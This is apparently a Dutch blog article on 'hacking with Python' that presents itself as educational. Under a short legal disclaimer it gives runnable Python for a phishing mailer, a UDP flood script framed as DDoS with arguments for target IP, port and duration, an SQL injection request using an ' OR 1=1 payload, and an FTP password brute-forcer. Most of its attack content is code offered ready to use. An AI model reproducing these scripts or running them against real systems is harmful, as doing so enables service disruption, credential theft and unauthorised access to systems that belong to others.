Hacken met Python: 5 Populaire Hacks

Hacken is een verontrustende activiteit die schade kan toebrengen aan computer- en netwerksystemen. Het is belangrijk om te benadrukken dat hacken illegaliteit is en ernstige gevolgen kan hebben, waaronder strafrechtelijke vervolging. Dit artikel is enkel bedoeld voor educatieve doeleinden en bevat informatie over de meest uitgevoerde hacks door hackers die de programmeertaal Python gebruiken.

1. Phishing-aanvallen: “Verleidelijke valstrikken”

Phishing-aanvallen zijn de meest voorkomende vorm van cybercrime en worden vaak uitgevoerd door hackers die gebruik maken van Python. Hackers creëren valse websites of e-mails die lijken op die van een vertrouwde bron, met als doel gevoelige informatie te stelen, zoals wachtwoorden of financiële informatie.

import smtplib

def send_email(subject, msg):
  try:
    server = smtplib.SMTP('smtp.gmail.com', 587)
    server.ehlo()
    server.starttls()
    server.login("youremail@gmail.com", "yourpassword")
    message = 'Subject: {}\n\n{}'.format(subject, msg)
    server.sendmail("youremail@gmail.com", "targetemail@gmail.com", message)
    server.quit()
    print("Success: Email sent!")
  except:
    print("Email failed to send.")

subject = "Phishing Email"
msg = "This is a phishing email message sent using Python."
send_email(subject, msg)

2. DDoS-aanvallen: “Overweldigende impact”

Een DDoS-aanval (Distributed Denial of Service) is een aanval op een server of netwerk waarbij een overweldigende hoeveelheid verzoeken wordt verzonden, waardoor het systeem overbelast raakt en niet langer in staat is om verzoeken adequaat te verwerken. Hieronder is een codevoorbeeld van een DDoS-aanval met Python.

import sys
import os
import time
import socket
import random

def usage():
  print("Python DDoS Script")
  print("Usage: " + sys.argv[0] + " <ip> <port> <packet size> <time>")
  print("\nExample: " + sys.argv[0] + " 192.168.1.1 80 65500 300")
  sys.exit()

def flood(victim, vport, duration):
  client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  bytes = random._urandom(1024)
  timeout = time.time() + duration
  sent = 3000

  while 1:
    if time.time() > timeout:
      break
    else:
      pass
    client.sendto(bytes, (victim, vport))
    sent = sent + 1
    print("Attacking %s sent packages %s at the port %s "%(sent, victim, vport))

def main():
  print("DDoS attack launched")
  if len(sys.argv) != 5:
    usage()
  else:
    flood(sys.argv[1], int(sys.argv[2]), int(sys.argv[4]))

if __name__ == '__main__':
  main()

3. SQL-injecties

Een andere veelgebruikte hack is SQL-injectie, waarbij hackers gebruik maken van fouten in de database-code om gevoelige informatie te ontgrendelen of wijzigingen aan te brengen in de database. Hieronder is een voorbeeld van hoe een SQL-injectie-aanval in Python uitgevoerd kan worden.

import requests

url = "http://example.com/search.php"
payload = {"q":"' OR 1=1; --"}
r = requests.get(url, params=payload)
if r.status_code == 200:
  print(r.text)

4. Brute-force aanvallen: “Doorzettingskracht in cijfers”

Een brute-force aanval is een methode waarbij alle mogelijke combinaties van gebruikersnamen en wachtwoorden automatisch worden geprobeerd totdat de juiste combinatie is gevonden. Hieronder is een codevoorbeeld van een brute-force aanval met Python.

import ftplib

def brute_force(password):
  try:
    ftp = ftplib.FTP("ftp.server.com")
    ftp.login("user", password)
    print("[+] Password Found: " + password)
    ftp.quit()
    return password
  except:
    pass

passwords = ["password1", "password2", "password3", "password4", "password5"]

for password in passwords:
  brute_force(password)

5. Scanning van netwerken en systemen: “Netwerk verkenning”

Met behulp van Python-bibliotheken zoals Scapy en Nmap kunnen hackers informatie verzamelen over netwerken en systemen om zwakte-analyse uit te voeren. Dit stelt hen in staat om in te breken en systemen te compromitteren. Bijvoorbeeld, een hacker zou een Python-script kunnen schrijven dat automatisch IP-adressen scant op bekende zwaktes en vervolgens tracht deze te exploiteren.